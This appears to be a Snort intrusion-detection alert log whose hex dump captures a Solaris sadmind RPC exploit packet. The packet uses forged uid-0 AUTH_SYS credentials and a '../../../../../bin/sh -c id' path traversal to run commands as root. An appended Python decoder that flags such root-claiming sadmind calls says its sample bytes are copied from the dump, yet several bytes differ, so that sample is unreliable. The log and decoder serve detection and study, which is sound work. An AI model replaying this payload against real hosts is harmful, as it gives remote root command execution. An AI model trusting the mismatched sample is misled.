00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33329) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16677 flags=0 offset=0 TTL=49 chksum=13348 UDP: port=60738 -> dport: 32779 len=1456 Payload: length = 1448 000 : 9B BE 2D 4F 00 00 00 00 00 00 00 02 00 01 87 88 ..-O............ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9C 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 A0 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
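Added example (not part of the original post): a decoder for the ONC RPC call header (RFC 5531 layout) at the start of the payload above, showing the fields the alert name refers to: program 100232 (sadmind) called with AUTH_SYS credentials carrying uid 0. The function and constant names are illustrative, and the sample bytes are copied from rows 000-040 of the dump.

```python
import struct

# First 0x44 bytes of the payload, copied from rows 000-040 of the dump in the post.
HEADER = bytes.fromhex(
    "F97B0C15 00000000 00000002 00018788 0000000A 00000001 00000001 0000001C"
    "40D78685 00000007 6578706C 6F697400 00000000 00000000 00000000 00000000"
    "00000000"
)
SADMIND_PROG = 100232   # 0x00018788, the program number seen at offset 0x0c
AUTH_SYS = 1            # AUTH_UNIX credential flavor

class RpcParseError(ValueError):
    pass

def _u32(buf, off):
    """Read one big-endian XDR unsigned int, refusing to run past the buffer."""
    if off + 4 > len(buf):
        raise RpcParseError(f"truncated at offset {off:#x}")
    return struct.unpack_from(">I", buf, off)[0], off + 4

def _opaque(buf, off, limit):
    """Read an XDR variable-length opaque: length, data, padding to 4 bytes."""
    n, off = _u32(buf, off)
    padded = (n + 3) & ~3
    if n > limit or off + padded > len(buf):
        raise RpcParseError(f"bad opaque length {n} at offset {off - 4:#x}")
    return buf[off:off + n], off + padded

def parse_rpc_call(buf):
    """Decode an RPC v2 CALL header and, for AUTH_SYS, the credential body."""
    call, off = {}, 0
    for name in ("xid", "msg_type", "rpcvers", "prog", "vers", "proc", "cred_flavor"):
        call[name], off = _u32(buf, off)
    if call["msg_type"] != 0 or call["rpcvers"] != 2:
        raise RpcParseError("not an RPC version 2 call")
    cred, off = _opaque(buf, off, 400)        # opaque_auth bodies are at most 400 bytes
    call["verf_flavor"], off = _u32(buf, off)
    _, off = _opaque(buf, off, 400)
    call["args_offset"] = off                 # procedure arguments start here
    if call["cred_flavor"] == AUTH_SYS:
        call["stamp"], c = _u32(cred, 0)
        name, c = _opaque(cred, c, 255)       # machinename is at most 255 bytes
        call["machine"] = name.decode("ascii", "replace")
        call["uid"], c = _u32(cred, c)
        call["gid"], c = _u32(cred, c)
    return call

def is_sadmind_root_call(call):
    """True when the call targets sadmind and claims uid 0 in AUTH_SYS credentials."""
    return (call["prog"] == SADMIND_PROG and call["cred_flavor"] == AUTH_SYS
            and call.get("uid") == 0)

if __name__ == "__main__":
    decoded = parse_rpc_call(HEADER)
    print(decoded, is_sadmind_root_call(decoded))
```

AUTH_SYS credentials are asserted by the sender and not verified, so the uid and machine name in the packet say what the client claimed, not who it was.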